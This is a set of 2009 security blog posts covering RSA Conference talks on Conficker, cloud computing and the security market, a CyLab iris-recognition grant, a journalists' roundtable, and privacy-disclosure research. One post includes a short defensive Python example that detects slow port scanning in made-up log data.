At BT's RSVP briefing luncheon, held off-site at Lulu's on Folsom Street, Bruce Schneier, BT's Chief Security Technology Officer (and industry icon), spoke on "Cyber Security Risks for 2009 and Beyond."

And what did Schneier see as the biggest risk this year and next?

Complacency.

He used the recent Conficker story to frame his remarks:

"Conficker was a huge media story in the run-up to April 1st. It pressed many of the fear buttons: no one knew what it would do, no one knew where it came from, it has a weird name and weird names make people afraid, it was big and it was magnified in the press. Everyone selling security or writing about security spun it. And then nothing happened. It was a 'Boy Who Cried Wolf' story. Of course, something did happen. It updated itself five days later. But that was not as good a news story.

"Stories that make good news often aren't real risks. There was nothing about April Fool's Day that made any difference. The press does not do any of us any favors by writing these stories. Fear mongering leads to complacency.

"Real risks are usually much more pedestrian. For example, the kind of cyber fraud and cyber espionage we see every day. If it is in the news, don't worry about it. If it is so common it's not in the news anymore, then it's something that we all have to worry about."

But Tim Le, BT's Director of Research and Technology for its Managed Security Services (MSM) followed Schneier with some other "Lessons Learned from the Conficker Triple Threat."

According to Le, BT sent out one thousand alerts about Conficker, but only 10% of Conficker incidents were detected by client intrusion detection systems (IDS).

Why?

Conficker utilized evasion capacities that had not been seen before in cyberspace. Conficker infected systems via USB keys and via mobile users. Conficker maintained a low profile; for example, unlike Slammer or Code Red, Conficker had sleep cycles and scanned only 100 times an hour (instead of thousands) so as not to trigger IDS. It also had a selective payload delivery mechanism, i.e., it scanned first and did not deliver its payload unless it detected the vulnerability it was looking for.

IDS, Le cautioned, look for a "smoking gun." Well, in the physical world you rarely get a smoking gun, Le added; it is more likely that you will have to build a case from circumstantial evidence. And just as in the physical world, in the digital world you rarely get a smoking gun either. MSM can look for the circumstantial evidence.

How?

By "logging broadly, and analyzing deeply." Le concluded with a very sobering admonishment, "Assume your IDS will not see an initial attack."
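As an added illustration of Le's point (example code, not anything from BT or the luncheon), the Python below runs the same constructed log lines through a per-minute burst detector, the "smoking gun" a signature-and-threshold IDS waits for, and through an hour-long count of distinct destinations per source. The addresses, ports, timings and thresholds are all assumptions made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed connection log (not real traffic). Three sources:
    - 10.1.1.50: Conficker-style, one new host every 36 s (100 probes/hour)
    - 10.1.1.99: Slammer-style, 300 probes inside a single minute
    - 10.1.1.10: a benign client, 20 distinct hosts over the hour"""
    start = datetime(2009, 4, 22, 9, 0, 0)
    lines = []
    for i in range(100):
        t = start + timedelta(seconds=36 * i)
        lines.append(f"{t.isoformat()} 10.1.1.50 -> 10.2.{i // 256}.{i % 256}:445 SYN")
    for i in range(300):
        t = start + timedelta(minutes=30, seconds=i // 5)
        lines.append(f"{t.isoformat()} 10.1.1.99 -> 10.3.{i // 256}.{i % 256}:1434 UDP")
    for i in range(20):
        t = start + timedelta(seconds=180 * i)
        lines.append(f"{t.isoformat()} 10.1.1.10 -> 10.4.0.{i}:80 SYN")
    return lines


def parse(line):
    """'<iso timestamp> <src> -> <dst>:<port> <proto>' -> tuple of fields."""
    ts, src, _, target, proto = line.split()
    dst, port = target.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port), proto


def alerts(lines, window, threshold):
    """Sources that touched at least `threshold` distinct destinations
    inside one window ('minute' or 'hour')."""
    seen = defaultdict(set)
    for line in lines:
        ts, src, dst, _port, _proto = parse(line)
        if window == "minute":
            key = ts.replace(second=0, microsecond=0)
        else:
            key = ts.replace(minute=0, second=0, microsecond=0)
        seen[(src, key)].add(dst)
    return {src for (src, _), dsts in seen.items() if len(dsts) >= threshold}


def fast_scan_alerts(lines, threshold=50):
    """The burst detector: only a scanner that hammers many hosts within a
    minute (Slammer, Code Red) shows up."""
    return alerts(lines, "minute", threshold)


def slow_scan_alerts(lines, threshold=50):
    """The 'log broadly, analyze deeply' detector: the same count over an
    hour, which also catches the 100-probes-per-hour pattern."""
    return alerts(lines, "hour", threshold)


if __name__ == "__main__":
    log = build_sample_log()
    print("per-minute burst detector flags:", sorted(fast_scan_alerts(log)))
    print("per-hour distinct-destination detector flags:", sorted(slow_scan_alerts(log)))
```

The assumed 36-second spacing never puts more than two probes in any one minute, so the burst detector is silent on the slow scanner while the hourly aggregation flags it and still leaves the benign client alone.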

A persuasive argument for MSM?

-- Richard Power

RSA Conference 2009: Analysts Sifting Thru the Rubble of the Economy, Address the State of the Security Business


RSA Conference 2009, 4/22/09

In a panel discussion on the "State of the Security Business," several leading industry analysts held forth on what is ahead in 2009 and 2010.

Just as in every other walk of life, the current global economic instability is significantly impairing even the savviest people's ability to see beyond yesterday and today, at least with any degree of confidence.

Nevertheless, there were some takeaways:

Panel moderator Sarah Friar, lead software analyst for Goldman Sachs, led off with some projections: global IT spending down 9%, software spending down 5% and, based on a recent CSO survey, security spending down 2%.

"Although the US and Israel have dominated the security market hitherto," John Pescatore, Gartner's lead analyst for Internet security, suggested that as we pull out of this slide in 2010, "there are powerful reasons for increased global competition," and therefore, "growth in the security market is not going to be reflected on NASDAQ."

Chris Christiansen of IDC provided some clarity in the frenzy of hyperbole swirling around "Cloud computing"; he encouraged people to think of the "Cloud" as infrastructure and SaaS as applications.

Nick Selby of 451 Group remarked that "people are under siege in large organizations," and that he was "starting to see collaboration in independent groups that would never have collaborated even a few years ago." For example, Selby added, as malware is increasingly targeting specific industries, "banks and pharma are looking proactively at attacks, before they are hit."

-- Richard Power

Tuesday, April 21, 2009

RSA Conference 2009: World-Class Cryptographers Muse on Cloud Computing and Mushroom Clouds

Nagasaki, 8-9-45
Notes from the Keynote Session (Continued), RSA Conference 2009, Tuesday 4-21-09

Well, however the tale of the Cloud plays out in the end; it is definitely providing a lot of fodder for the best and the brightest.

At this year's iteration of the legendary RSA Conference Cryptographers Panel, there was provocative discussion of the Cloud:

Whitfield Diffie, Vice President, Fellow and Chief Security Officer of Sun Microsystems, said he is "bullish on Cloud computing" and that it is the type of challenge "seen not more than twice before" in the space.

But Adi Shamir, Professor of Computer Science at the Weizmann Institute of Science in Israel, is "very worried about it." According to Shamir, we risk trading in "many small disasters for one big catastrophe."

"Now that we are possibly moving into the cloud," he elaborated, "we are facing a real danger of a hacker taking out one data center to catastrophic effect."

True to his studied stance, Bruce Schneier, Chief Technology Officer, BT Counterpane, said he is "bored with cloud computing." Although it is presented as new paradigm, Schneier explained, "fundamentally, I do not see many differences, it is still about trust, it is a continuation of what we have been seeing."

And although he described himself as "enthusiastic" over it, Ron Rivest, Viterbi Professor of Electrical Engineering and Computer Science at MIT, poked fun at the endearing term "Cloud computing" and suggested that "Swamp computing" might be more appropriate. Rivest also encouraged the attendees to consider the possible analogy with the derivatives craze that led to the current global financial crisis: in both instances, CEOs derive benefits while off-loading risks, and there could be similarly severe consequences.

But from my perspective, Martin E. Hellman, Professor Emeritus of Electrical Engineering at Stanford stole the show.

Hellman is working on the dangers of a very different kind of cloud.

Hellman asks, "How risky is nuclear deterrence?" "1100 times riskier than having a nuclear power plant near your home," he posits.

He encourages the audience to do a Google search on "Hellman cryptography nuclear" to drill down into his current work, and also gave out the URL for his site, nuclearisk.org

He characterized the human race as possessing the physical powers of a god with the psyche of a 16-year-old boy. If we do not "grow up really fast and pay attention to risks before they become obvious," we face calamity beyond comprehension.

"Trial and error are not enough, we have to rely on forecasting ability."

Hellman drew from the example of the current global financial crisis.

There were repeated warnings about derivatives, he recounted: Sen. Byron Dorgan (D-ND) in 1994, Brooksley Born of the CFTC in 1998, and Warren Buffett, who sounded the alarm about "financial weapons of mass destruction" in 2002.

Society, Hellman noted, never seems able to recognize risks until it is too late, and he cited nuclear weapons proliferation, the economic crisis and data security as prime examples.

"We risk being called Cassandras," he acknowledged, but exhorted the audience not to be dissuaded by this inevitability, because "Cassandra was always right."

-- Richard Power

RSA Conference 2009: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes



"Those who dream by day are cognizant of many things which escape those who dream only by night." Edgar Allan Poe

Notes from Keynote Session, RSA 2009, Tuesday, 4-21-09: Elgamal Strikes Poignant Note, Coviello and Salem Paint in Bold Strokes

This RSA keynote session opened with a documentary short film tribute to the 19th Century storyteller Edgar Allan Poe, a writer of "brave imagination willing to venture into the dark parts of human nature to illuminate the truth on the other side." Of course, Poe also had a keen interest in cryptography.

Legendary Egyptian cryptographer Taher Elgamal was honored with the RSA 2009 Lifetime Achievement Award. In his moving remarks accepting the award, Elgamal expressed joy and wonderment. “The thing about this industry,” Elgamal remarked, “is that it is fun, we get to deal with mythic creatures like Trojan Horses and Zombies.” Elgamal also shared a poignant insight into his inner life. From childhood, he said, he was in love with numbers, and believed for many years that the world was ruled by “one massive equation,” but now, he said, he has come to realize that “whether or not the equation exists, it is the journey that matters.”

In delivering the opening speech of the Tuesday keynote session, Arthur Coviello, Executive VP of EMC, and President of RSA, EMC’s security division, declared: “The vendor community must take lead in building secure, robust eco-system.”

Coviello talked of security being on the verge of one of those tipping points where evolution turns into revolution, and he suggested that the “decoupling” of policy management from the individual security point products was the real breakthrough that would lead to overcoming the criminal threat.

In the next speech of this keynote session, Enrique Salem, President and CEO of Symantec, declared “operationalizing security” the overriding imperative.

Salem described security managers as tired of being “system integrators” and fed up with “silos.” “It is time to change the way we do security,” Salem said, “it is time to operationalize security.”

“It is possible to have an integrated solution that drives security across your entire environment,” Salem promised, “a solution that is risk-based, information-centric, responsive (i.e., situation-aware) and workflow-driven.” Automating manual processes and bridging between silos, Salem added, are key elements.

Some thoughts on the speeches of Coviello and Salem:

Surely we all can embrace both the vision of building a “secure, robust eco-system” and the role that “operationalizing security” would play in fulfilling such a vision.

But is it optimal, as Coviello suggests, that “vendors must take the lead” in the effort to create this eco-system? This is a topic worthy of serious reflection.

Certainly, the vendor community has the profit motive, the resources, etc., and certainly the vendor community would have to develop and sustain vital elements of such an eco-system; but should they -- can they -- lead the effort to create it? It is not at all clear that it is the vendor vision that should dominate, and the vendor agenda that should dictate.

What of the other co-creationists, e.g., government, academia, industry sectors and citizen groups?

There are many blind spots from each of these perspectives. How can we collaborate to overcome them with a unified field of collective vision?

These should be open questions. But the forward momentum may simply over-write such questions. Market forces, like nature, abhor a vacuum.

Another observation, not only on these two keynotes but on much of the collateral and sales pitches out there on the threshing floor of the Expo: there seems to be a preoccupation with the threat of “fraudsters” and “identity thieves.”

Well, in the 1990s, the conventional wisdom was that the biggest issue was the insider threat and that most of the rest of it was juvenile hackers. Both the threat of criminal hacking for profit, and the high-grade threat from corporate or state-sponsored spies were being paid insufficient attention.

Is the high-grade threat still being paid insufficient attention?

-- Richard Power

Monday, April 20, 2009

RSA Conference 2009: "Imagination is More Important than Knowledge" (Albert Einstein)

First page of Einstein's manuscript explaining general theory of relativity


CyBlog on the Road: RSA Conference, Monday, 4-20-09

The provocative words of Albert Einstein hung from a banner over the escalators that led down into RSA Conference 2009: "Imagination is more important than knowledge."

Of course, coming from Einstein, such a statement presupposes a strong, almost supernatural baseline of knowledge upon which to launch out into imagination.

And certainly, by "imagination" Einstein did not intend flight into self-indulgent fantasy; he meant to break through the limitations of the known and tap into the unknown to solve the problems of the known from the other side.

Well, bravo for RSA's choice of motto for its "Innovative Sandbox," which was the highlight of the first day of the 2009 conference.

"Innovative Sandbox" was billed as a "half-day, interactive workshop program" through which attendees could "explore and shape technologies that promise to transform the information security industry." It featured brainstorming sessions, complete with whiteboards, facilitated by industry luminaries, and a "Most Innovative Company" contest presided over by an expert panel.

One intriguing Swedish start-up, BehavioSec, offers what it calls the "first Continuous Authentication of end users through Behaviometrics (behavioral biometrics)." The product, Behavio, is based on an "innovative technology that exploits the user's unique behavior while using a keyboard and mouse to create a token that cannot be replicated."

But the winner of the competition (and my personal choice as well) was Alert Enterprise of Fremont, California. Using "graphical, geospatial monitoring, alerting, mitigation, multi-source analytics," etc., the start-up's two products, AlertAccess and AlertAction, are intended to address the dangerous gap between cyber security, physical security and control system security in the enterprise.

Considering that there will no doubt be a lot of mile-high talk about "the Cloud" over the next few days, bestowing an award -- this first evening of the conference -- on a product that deals with how the physical and cyber worlds interpenetrate and what that means to risk mitigation in both spheres was not only deserved but quite meaningful symbolically.

-- Richard Power

Sunday, April 19, 2009

DoD Awards $1.5 Million Grant for CyLab Iris Recognition Research



"This is a huge breakthrough," said Robert Baer, a former CIA operative, who is familiar with Savvides' work on real-time iris recognition. Baer's book, "See No Evil: The True Story of a Ground Soldier in the CIA's War on Terrorism," was made into the 2005 film, "Syriana," starring George Clooney. Pittsburgh Tribune-Review, 4-19-09

DoD Awards $1.5 Million Grant for CyLab Iris Recognition Research

The CyLab Biometrics Lab, led by Mario Savvides, continues to push the envelope.

Excerpt from the Pittsburgh Tribune-Review, with a link to the full text:

Iris and face recognition soon could be the new fingerprints for criminal investigators and even U.S. troops, thanks in part to researchers at Carnegie Mellon University.
Though troops use iris-recognition technology in Iraq, targets must remain stationary for several seconds and at a distance of about 13 centimeters, roughly 5 inches, for the camera to work, said Marios Savvides, a CMU professor of electrical and computer engineering who directs the school's CyLab Biometrics Lab.
"We are improving the way we do forensic analysis," Savvides said. "We're providing tools so computers do this automatically."
The Department of Defense awarded $1.5 million in grants to Savvides and his team earlier this week to help them develop an iris-recognition system that instantly will identify unique iris markers in the eyes of people moving up to 13 meters away, or about 43 feet.
"This is a huge breakthrough," said Robert Baer, a former CIA operative, who is familiar with Savvides' work on real-time iris recognition. Baer's book, "See No Evil: The True Story of a Ground Soldier in the CIA's War on Terrorism," was made into the 2005 film, "Syriana," starring George Clooney.
Pittsburgh Tribune-Review, 4-19-09

Some Related Posts:

CyLab Chronicles Q&A with Mario Savvides

CyLab News: CyLab's Savvides Invited to Speak at NSA Conference

CyLab Researcher Selected To Join New Center For Academic Studies In Identity Sciences

CyLab News: Information Security Magazine Highlights CyLab’s Lead in Vital Research

CyLab Researchers Developing New Technology to Detect Enemies

Thursday, April 16, 2009

CyLab Virtual Roundtable on Cyber Security News Media



The single most important trend will continue to be exposing just how deeply the bad guys -- both cyber criminals motivated by financial gain, as well as nation states -- have penetrated nearly every aspect of our economy, government and private industry. Brian Krebs, Washington Post

It seems that today, while there is a lot of data on security, the data that matters is far harder to uncover. Robert Lemos, SecurityFocus

Vendors try to push their compliance, encryption and data loss prevention products on this notion that brand reputation is irreparably harmed in a breach, but it just ain't so. Michael Mimoso, Information Security Magazine

A very good journalist once said to me that often, the most important decision a reporter can make is *not* to write a story. It's hard in this beat. Bob Sullivan, MSNBC

CyLab Virtual Roundtable on Cyber Security News Media

-- Richard Power


The professional challenges of cyber security are daunting. The problems confronted are extremely complex. The stakes are very high. You often find yourself the bearer of bad news, surrounded by Pollyannas and Chicken Littles. The priorities you are handed are often skewed. The motivations you encounter are often mixed. The resources you are allocated are usually inadequate. The executive mandates issued are typically tepid. Technological advancements race at light speed; meanwhile, organizational reforms crawl around in circles, at a snail's pace.

The professional challenges of cyber security journalism are almost as daunting. You must report on stories that, in large part, cannot be told, drawing on people who, in large part, cannot be quoted, and referencing statistics that are, in large part, suspect. All the while, you must separate hard news from hyperbole and be certain you are not the unwitting agent of some hidden agenda. And in the end, you must deliver a product that is comprehensible, informative, engaging and succinct to a public that is both skeptical and naive, distracted and over-stimulated.

Having experienced both sets of challenges first-hand, I have a great empathy and respect for those who endeavor to overcome them.

So here and now, in 2009, as we prepare (incredibly) to close out the first decade of the 21st Century, I felt it would be insightful and thought-provoking to check in with some of the best journalists covering the cyber security beat.

This virtual roundtable includes four friends and colleagues of mine, two from mainstream news media, two from cyber security industry news media, sharing their perspectives in response to four important questions.

The Washington Post's Brian Krebs has an excellent blog, Security Fix.

MSNBC's Bob Sullivan also has an excellent blog, Red Tape Chronicles.

Michael Mimoso is Editor in Chief for leading industry publication, Information Security Magazine (aka SecuritySearch.com online)

Robert Lemos is a freelance technology journalist and acts as the managing editor for Symantec's great site, SecurityFocus.

Enjoy.

What is the greatest journalistic challenge in covering cyber security? What element of the subject matter makes the assignment most difficult?

Brian Krebs, Washington Post: Probably the greatest challenge is getting people to care, and learn enough so that they can be a catalyst for helping others understand how important this issue is. The subject matter itself makes the assignment difficult: Explaining the latest threats simply and offering easy solutions without overburdening readers is a huge challenge, and one that becomes even more daunting every day. Here we have a communications medium that has become so central to everyone's lives, yet so few people have a grasp of even the basics of how it works, or how they could live without it, until...well, for one reason or another usually related to insecurity, they are forced to live without it, however temporarily. The challenge is to grab the reader at those teachable moments, and use those to turn people into converts who place security on par with checking the sports scores, or all of the rest of the issues normal people care about on a day-to-day basis. That may sound unrealistic, but consider that the world we live in is only becoming more networked and linked together every day. What's more, very few readers have a sense of how a failure to stay educated about this medium contributes to the problem globally. A person whose PC or Web site is being used to blast out spam or host phishing Web sites, for example, is unlikely to ever be negatively affected by that experience. In addition, there are larger public policy and public safety issues stemming from computer and Internet insecurity that rise to the level of nation state concerns. These concerns also usually trace back to apathy, a lack of awareness, or a failure to act at an individual level.

Robert Lemos, SecurityFocus: For many journalists, the technical nature of cyber security can be a significant problem. Yet, for the most part, my readership comes from the security world, so the technical aspects of the beat are not as great a barrier. The real problem with cybersecurity is that there is a paucity of good data about security problems. Part of the issue is that companies do not want to talk about attacks or about their systems' weaknesses.
While such reticence may have been understandable in the past, times have changed. Fueled by easy -- albeit, unauthorized -- access to sensitive systems, espionage is undergoing a revival. Corporate computer systems are regularly being compromised by targeted attacks.
The networks of government agencies are being infiltrated by -- if not state-sponsored, then state-condoned -- hackers.
This is not just a journalism issue; it's a general security issue. A major government contractor had serious issues with the Conficker worm, but they would not talk about it on the record. When you can't understand the scope of a problem, it's difficult to combat the problem.

Michael Mimoso, Information Security Magazine: Off the top, you would think it would be the unwillingness of sources, especially in corporate and government settings, to speak to journalists about incidents, technology choices, best practices or anything else they believe might expose them to attack. And that's clearly understandable.
But I think the biggest challenge is that the majority of journalists are just that, journalists. Many of us don't have the technical background that our audience has, and yet our job, our mission, is to inform an audience that is closer to the subject matter than we will ever be. No matter what amount of homework I do on my own and how many security researchers I know and trust for information, my readers know the material better than I do and if I miss with an article, I'm going to get called on it. Ultimately, that makes me a better journalist, and forces me to be very careful and cynical of vendor FUD and hype.
Overall, I think the security media does a solid job, but a lot of our good work gets undone by the mainstream media. The mainstream media isn't as discriminating with its coverage -- just look at Conficker and, for example, what 60 Minutes did with its piece -- and ultimately, I think we're all painted with the same brush, which does a disservice to both our audiences.

Bob Sullivan, MSNBC: #1. The 'spook' factor, or the junior g-man factor. No one, it seems, ever wants to put their name on anything. So the stories are all reduced to "I know a guy who knows a guy who ... says the Internet almost melted down last week." As a journalist I hate those stories. Combine that with the national security issue, and boy it's difficult.
#2. It's so easy to plant a scary story in some media outlet somewhere, which leads many editors to run into their newsrooms and say, "Why don't we have this story?" Similarly, it's easy to get front-page treatment when you write about a potential disaster, but hard when you write an even-handed story suggesting this or that might be overblown. A very good journalist once said to me that often, the most important decision a reporter can make is *not* to write a story. It's hard in this beat.

How has the cyber security beat changed over the years? How is it different now than it was five or ten years ago?

Krebs: Cyber security as a concern is far more "in-your-face" that it ever was. Today, it is possible for people to find their Web browser, Facebook or Twitter account or whatever they use to interact online, hijacked by cyber thieves just by clicking on a link.
This type of activity is only the most visible symptom of a much larger problem, which is that hackers are now entirely motivated by financial gain, combined with very little chance of getting caught. They are organized, they reinvest their gains to make future attacks and scams more believable, robust, and scalable, and they are more brazen and successful than ever.

Lemos: It's a cliche when talking about "The Old Days" -- which in Internet time is the early 90s, of course -- but they were a lot simpler. Journalists had better access to hackers and even the criminals who were circumventing computer security for fun and profit. Hackers and academic security researchers used to be open about what they were doing, and even when they weren't, techniques for hiding data were seldom used, so an enterprising reporter could learn more.
When at ZDNet in the late 1990s, I worked with other reporters there to analyze telltale information in the Melissa virus to help find out more about the author. With worms and attacks that followed -- from ILoveYou to Code Red to the MSBlast worm -- data became scarcer and scarcer. With MSBlast, Microsoft let slip that they had cleaned more than 8 million instances of the worm from systems, an unprecedented number. After it reached 25 million, the company stopped talking about the data. With the Conficker worm, there seems to be a lot less discussion about how widely it has spread. It seems that today, while there is a lot of data on security, the data that matters is far harder to uncover.

Mimoso: The story is much different. Two things have changed from 2000 when I started covering security: regulation and cybercrime. Security professionals in many instances have become compliance professionals. Investments in technology are often made based on a regulation an organization has to comply with. Policy decisions are often made based on a regulation an organization has to comply with.
That often leaves organizations with misguided priorities and a false sense of security. Cybercrime, meanwhile, is getting more pervasive and dangerous. It's the quiet attacks that should worry companies and individuals, more so than the splashy TJX-style data breaches. Hackers are using stealthy web-based malware to steal money from bank accounts, or intellectual property from large organizations. They're also conducting sophisticated denial-of-service attacks using botnets comprised of tens of thousands of compromised machines, in order to extort companies for large sums of money. All of this is incredibly troubling, profitable for the criminal and not going away any time soon.

Sullivan: Certainly, the spotlight has faded. Ten years ago, DefCon was actually interesting to a national audience. The Melissa virus really did impact everyone. Paradoxically, today's threats are more serious, involve much more money, etc., and yet they no longer capture the national audience quite as readily as they once did. That's not to say they don't capture attention at all -- certainly a big ID theft case, or a big virus, still nets big attention. But think about this: how many credit cards have to be stolen for something to be a big story nowadays? The initial ChoicePoint story involved fewer than 100,000 records, and made front pages all around the country. Today, no one would even cover that story.

What is the most pervasive false meme that you confront among your editors and readers? What is the biggest blind-spot out there?

Krebs: The idea that information security is something that is somehow beyond the capability or understanding of the average Internet user is a false meme that I encounter quite often. The reality is that it isn't realistic to expect people to protect themselves from 100 percent of the threats 100 percent of the time, nor would you want people to live that way. That said, being safe online, being smart about your identity, avoiding scams and generally not being sucked into contributing to activities that scam or attack others, requires very few, relatively simple steps, mixed with a little bit of common sense.

Lemos: SecurityFocus readers are pretty savvy people, so this is less of a problem for me than most reporters. In the general populace, I see a lack of understanding of the insecurity of people's data and identity. We are still worried about breaches that release Social Security numbers, for example. In reality, we should assume that everyone's Social Security number has already been released and develop systems that do not rely on that piece of information as a key to our credit reports and financial data. Also, it still seems that people believe that somehow -- through security software and patching -- the threat of having your computer system compromised can be mitigated. It can only be reduced. Microsoft and others have documented that cybercriminals are focused on fooling users, not using technical exploits, to compromise computer systems. The biggest vulnerability on most computer systems is the user, and attackers have recognized that.

Mimoso: Data breaches hurting brand reputation. It's just not true. I think you'd be hard-pressed to find a company -- aside from CardSystems, which was ultimately forced to go dark before its assets were acquired -- that was negatively impacted by a data breach. TJX is a good example. It is still cruising along; yes there was an initial hit to the stock price once news of the breach hit, but as of last summer, shares were selling higher than at any point since 2004. Vendors try to push their compliance, encryption and data loss prevention products on this notion that brand reputation is irreparably harmed in a breach, but it just ain't so. Same goes for data breach disclosure laws; while these laws have increased awareness around the importance of protecting data and identity theft, they have done little to make processes or systems more secure. And they do very little to influence customer behavior, especially with credit card breaches where very little liability is passed to the consumer.

Sullivan: I think it's really hard to steer both editors and readers towards the things that are really important, but perhaps more subtle. Every week there's a new study out that shows viruses are up, or vulnerabilities are up, or hacking attempts are up, and these make for great headlines. But the studies are often poorly designed and don't mean much. On the other hand, for example, I really want people to think twice before they sign up for supermarket loyalty cards and EZ-Pass and those kinds of invasive technologies. I at least want them to understand the consequences before they do it. How do I make that story sexy enough to compete with a story about an alleged Internet meltdown that's coming? There's no easy answer.

From your perspective as a journalist, what issues and trends jump out at you as particularly important or dominant in the coming year?

Krebs: A major contributor to the success of these gangs is that the most powerful nation on Earth still can do very little to touch cyber criminals operating in certain countries. The single most important trend will continue to be exposing just how deeply the bad guys -- both cyber criminals motivated by financial gain, as well as nation states -- have penetrated nearly every aspect of our economy, government and private industry. Longer term, if this situation does not change, if we cannot succeed in bringing cyber gangs to justice, we will have missed an important opportunity. I believe that five or ten years from now, we may well look back fondly on the age we live in now as a time when we still had an opportunity to kill some of this cyber crime in the crib and disperse the organizations that are driving it. I believe our inability to apprehend and bring to justice those who are responsible for stealing hundreds of millions of dollars from consumers and businesses is going to haunt us down the road, as these groups mature, become more emboldened, and more entrenched in the political and economic classes of the countries that act as safe havens for them.

Lemos: The most important trend is that, in the midst of a boom in cybercrime and cyber espionage, the United States and other nations have started formulating better defensive strategies and a doctrine for offensive actions in cyberspace. Whether these nations create a good policy or create policies that attempt to control the Internet for no real gain will be a significant story over the next few years.

Mimoso: The economy. It's going to be interesting to see how the recession impacts the emphasis companies place on information security. For instance, are important security projects/investments going to be tabled or canceled altogether? A lot of companies are paying lip service right now to the importance of keeping data and customer information secure and maintaining the integrity of security programs during this downturn. But security is traditionally a cost center where ROI is extremely difficult to prove. We'll see if the bottom line ultimately wins out. An offshoot of the recession too is whether we'll see additional regulation coming out of this. Chances are we will, but it will likely take some time before we see any real impact.

Sullivan: 1. Attackers targeting Facebook and other social networking tools.
2. Cyber cold war: Real now?
3. Impact of the economic downturn on security. Companies cutting back? Layoff revenge? Consumers taking more risks?

Wednesday, April 15, 2009

CyLab Seminar Series: Of Frogs, Herds, Behavioral Economics, Malleable Privacy Valuations, and Context-Dependent Willingness to Divulge Personal Info


[NOTE: CyLab's weekly seminar series provides a powerful platform for highlighting vital research. The physical audience in the auditorium is composed of Carnegie Mellon University faculty and graduate students, but CyLab's corporate partners also have access via the World Wide Web. On a frequent basis, CyBlog will whet your appetite by offering brief glimpses into these talks. Here are my notes from a talk delivered by Alessandro Acquisti on 4-6-09. -- Richard Power]

The boiling frog story states that a frog can be boiled alive if the water is heated slowly enough — it is said that if a frog is placed in boiling water, it will jump out, but if it is placed in cold water that is slowly heated, it will never jump out. Wikipedia

CyLab Seminar Series Notes: Of Frogs & Herds, Behavioral Economics, Malleable Privacy Valuations, & Context-Dependent Willingness to Divulge Personal Info

Carnegie Mellon University CyLab researcher Alessandro Acquisti, Assistant Professor of Information Technology and Public Policy at Carnegie Mellon’s H. John Heinz III College, always warns his students not to trust Wikipedia; nevertheless, this Boiling Frog story, whether apocryphal or not, provides a useful foil for some fascinating research.

Working with collaborators Leslie John and George Loewenstein, Acquisti has been delving into the mysteries of privacy and security from a behavioral economics perspective. Acquisti and his colleagues see a great application for this particular discipline in the exploration of privacy and security decision-making.

“Behavioral economics is a field of economics that combines psychology plus more traditional economic thinking to understand why people really make decisions, and why certain decisions are sometimes sub-optimal, inconsistent and paradoxical,” Acquisti explains.

Acquisti's seminar focused on three studies his team had conducted:

Study 1: The “frog” effect (or lack thereof) on information disclosure.
Study 2: The “herding” effect on information disclosure.
Study 3: The effect of framing on privacy values.

“We feel we are uncovering something novel and peculiar to the privacy area.”

These notes will focus on Study 1.

The research on the "frog" effect explores the impact of privacy intrusions on the propensity to disclose, and in particular what Acquisti sees as "a crucial question, one of the most interesting questions, and one of the most difficult to answer: Do privacy intrusions (and how we react to them) alert or rather desensitize individuals to privacy concerns?"

“We live in a society in which every week in the media there is some new event, e.g., exposing personal data on millions of consumers, NSA is spying on domestic communications, passport records of important people are being accessed illegally, etc. Does all of this exposure to privacy intrusions make people believe that well, there is no privacy any longer, so I stop caring; there is so much information out there that there is nothing I can do about it? Or, in fact, is it the opposite, there is so much discussion and so much evidence of intrusions that it will create the opposite effect, at a certain moment, subjects start saying this is too much, enough is enough, and start reacting?”

“This is a difficult question to answer. Because you have to combine longitudinal data and effect, the age effect and the cohort effect, e.g., ‘Do young people use Facebook so much because they are young (age effect) or because they are born in a certain culture (cohort effect)?’ And in the absence of a longitudinal study that tracks people over ten, twenty or thirty years, what we did was simulate a scenario of privacy intrusions by creating a survey of questions with different levels of sensitivity. The sensitivity of the questions ranged from the tame, e.g., ‘Have you ever failed to turn the lights out at home or at work when you left?’ to the intrusive, e.g., ‘Have you ever had sex with the current husband, wife or partner of a friend?’”

The survey included ten tame questions, ten moderately intrusive questions, and ten intrusive questions. The design of the survey included randomly assigning respondents to eight different conditions, e.g., the order of the questions, i.e., from tame to intrusive or from intrusive to tame, as well as in pseudo-random or sudden order. It was framed as a survey on “ethical behavior.” Another important factor was when respondents were asked for identifying information, i.e., at the beginning or at the end. “As you can imagine, people were much more willing to give an e-mail address before seeing the survey than after seeing what the survey was about.” The pool of respondents consisted of online readers of the New York Times (NYT), and the survey was linked to from the blog of a NYT op-ed columnist.

“We manipulated the order in which questions were presented to survey participants. Some subjects would see a survey which started with very tame questions and then increasingly became very intrusive. While other subjects started from the very intrusive questions and then went down to questions of lower and lower sensitivity.”


Two hypotheses were tested: the “Frog” hypothesis and the “Coherent Arbitrariness” hypothesis. The “Frog” hypothesis says that people will admit to sensitive behavior more often when they get “warmed up” by getting the tame questions before the more intrusive ones. The “Coherent Arbitrariness” hypothesis says that people will admit to sensitive behavior less often when they are “warmed up” by the survey, because their expectations about the intrusiveness of the survey will be established early on.

The “Coherent Arbitrariness” hypothesis was the one supported.

The “Frog” hypothesis was strongly rejected by the data.

Subjects in the increasing condition admitted to sensitive, moderate, and tame behaviors less often than subjects in other conditions.

Subjects in the decreasing condition admitted to sensitive behaviors more often than subjects in other conditions.

Bottom line: starting a survey with tame questions, then increasing their intrusiveness, inhibits information disclosure. Sensitive behaviors were more frequently admitted to when asked first.

To read a CyLab Chronicles Q&A with Alessandro Acquisti, click here.

For information on the benefits of partnering with CyLab, contact Gene Hambrick, CyLab Director of Corporate Relations: hambrick at andrew.cmu.edu

Glimpses into the 21st Century Threat Matrix: 285 Million Records Compromised, Success of Twitter Raises Issues, and German Insight on GhostNet


Our forensics team analyzed thousands of data points from investigations around the world – including many never publicly reported – and found that in 2008 alone, more than 285 million records were compromised. That’s more than the previous four years combined. 2009 Data Breach Investigations Report

Four variants of the worm hit Twitter, bringing back memories of the infamous -- and groundbreaking -- Samy worm that snaked through MySpace several years ago. ... Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog. SC Magazine, 4-13-09

German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. Der Spiegel, 4-10-09

Glimpses into the 21st Century Threat Matrix: 285 Million Records Compromised, Twitter's Success Raises Issues, & German Insight on GhostNet

Here are some news items, data trends and background stories you might find useful.

